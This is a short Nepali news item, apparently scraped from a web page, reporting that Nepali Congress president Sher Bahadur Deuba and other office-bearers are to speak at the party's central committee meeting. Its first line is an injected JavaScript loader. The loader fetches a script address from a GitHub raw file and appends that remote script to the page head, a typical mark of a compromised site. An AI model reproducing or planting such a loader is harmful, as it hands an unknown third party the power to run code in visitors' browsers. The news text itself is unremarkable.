;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
नेपाली कांग्रेसको केन्द्रीय समिति बैठकमा सभापति शेरबहादुर देउवासहित पदाधिकारीले आज धारणा राख्ने भएका छन्।
उपसभापतिद्वय पूर्णबहादुर खड्का र धनराज गुरूङ तथा महामन्त्रीद्वय गगन थापा र विश्वप्रकाश शर्माले धारणा राख्दैछन्।
गत साउन २ गतेदेखि सानेपास्थित केन्द्रीय कार्यालयमा केन्द्रीय समिति बैठक बसेको थियो।
१० एजेन्डा र महामन्त्री थापाले पेश गरेका वार्षिक कार्ययोजनामा केन्द्रित रहेर केन्द्रीय सदस्यहरूले धारणा राखिसकेका छन्।
लाइभ:
फेसबुक प्रतिक्रियाहरु